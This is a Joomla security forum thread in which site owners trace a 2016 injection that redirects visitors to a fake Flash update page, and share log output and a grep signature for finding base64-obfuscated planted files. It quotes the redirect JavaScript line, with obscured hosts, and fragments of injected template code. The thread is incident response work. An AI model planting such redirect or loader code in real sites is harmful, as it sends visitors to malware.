";} /*B6D1B1EE*/ ?> at top of site

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
MiscCoder
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Fri Sep 02, 2016 1:14 pm

fcoulter wrote: If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript

Code: Select all

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
That URL which I have obscured is a fake Adobe update site, it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware, if it is not working then that is just good luck on our part.
This might be a new development, the other day it was just returning the exact same JS that called that URL in the first place.

edit: Actually I'm still just getting the same JS. Oh well.

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1630
Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Fri Sep 02, 2016 2:27 pm

It may be that it is designed to only return the fake Adobe update at random times, I think that this rather convoluted method of loading the malware is intended to try and generate confusion so that it is not picked up by malware scanners.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"

maironrozendo
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Sep 02, 2016 5:18 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by maironrozendo » Fri Sep 02, 2016 5:29 pm

harps_kal wrote:
rogeriovaz wrote:Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
The same for me,

The attacker was using a HTPP POST to /libraries/phpxmlrpc/compat/article48.php send spam mail.

also changed the modified date of article48.php so that it wasnt obvious.

Also got some spam email from this forum as soon as I registered.

While I work out what to do I im using a static rip of the joomla site .
Hi harps_kal

How you stop send spam mail?

I have over 300 websites and have been contaminated about 10 websites.

I use Plesk Panel and I work with host, I'm turning off the PHP and notify customers.

Best Regards

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Fri Sep 02, 2016 5:31 pm

fcoulter wrote:Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.

It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL,

If you load the URL [url]http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600[/url], ie with a time zone and screen dimensions then actually it returns this javascript

Code: Select all

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
That URL which I have obscured is a fake Adobe update site, it is most likely trying to produce a fake Flash update notice to try to trick users into downloading malware, if it is not working then that is just good luck on our part.
This makes sense as the other day a fake Flash update page had loaded, but I had multiple tabs open at the time so it was tough to tell where it came from. This explains it though.

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Fri Sep 02, 2016 9:31 pm

Just noticed also in:

modules/mod_stats

There is a new file called:

jstats.php

Hopefully this sheds more light on things

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Tue Sep 13, 2016 8:56 pm

I just wanted to follow this up.
Whatever script was added to my site, something happened today, it tried running it from some new code in my template index file:

language=JavaScript id=onDate
language=JavaScript src=/media/system/js/stat052.php
";};$0520cee5=1; ?

But because I already deleted the media/system/js/stat052.php file it didn'y work and instead gave the site 500 errors when trying to access it.

Hope this helps someone.

nigelbb
Joomla! Apprentice
Joomla! Apprentice
Posts: 39
Joined: Wed Aug 15, 2007 10:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by nigelbb » Wed Sep 21, 2016 3:14 pm

I just found this hack in a Joomla 1.5 site that I host. I found other JS infections too but was able to track down the bad files & replace them with known good copies with some relatively simple measures so am adding my experiences in the hope that this can help others similarly afflicted. I have root access to the site on a WHM/cPanel managed virtual server so logged in as root & issued this command with results of similar form to this:-

Code: Select all

tail --lines=100 /usr/local/apache/logs/suphp_log
[Tue Sep 20 21:40:52 2016] [info] Executing "/home/websiteA/public_html/index.php" as UID 518, GID 514
[Tue Sep 20 21:41:12 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:41:13 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:41:49 2016] [info] Executing "/home/websiteB/public_html/index.php" as UID 533, GID 529
[Tue Sep 20 21:43:50 2016] [info] Executing "/home/websiteC/public_html/libraries/openid/Auth/OpenID/session57.php" as UID 551, GID 549
The bad JS is being run from the file libraries/openid/Auth/OpenID/session57.php on websiteC I found several files buried deep that had plausible names but were not part of the Joomla installation. There were files in the root of the website with filenames like system.php or licence.php which again were not part of the Joomla installation.

The key way of identifying the bad files was that they all contained base64 encoded obfuscated JS & can generally be found by searching for any files containing the base64 decode string in a fashion similar to this:-

Code: Select all

grep -r '"64_decode";return' /home/websiteC/www/*
Of course replace websiteC etc by the WHM username for the account that hosts the website. Once you have seen one of the hacked files the signature is pretty distinctive.

I know that the website needs upgrading but it's run by a small non-profit using Joomfish for multilingual features plus an ancient Wordpress for Joomla plugin & some other photo gallery plugins. It would be impossible to upgrade to Joomla 3.6 & the only realistic option is to eventually to start from scratch & replace it with a more easily managed Wordpress website which offers better security with minimal management. In the meantime all I can do is lock down the site as far as possible adding the post 1.5.26 security patches & monitoring the site rigorously with lfd so I can step in at any sign that it's been hacked.

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1630
Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Wed Sep 21, 2016 6:12 pm

The wordpress for joomla plugin still exists and is available for J3.6: https://extensions.joomla.org/extension ... for-joomla so I don't think this should be a barrier to updating.

Migrating Joomfish content is more difficult, you might do better re-creating those using the Joomla language manager.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"


Post Reply

Return to “Security in Joomla! 1.5”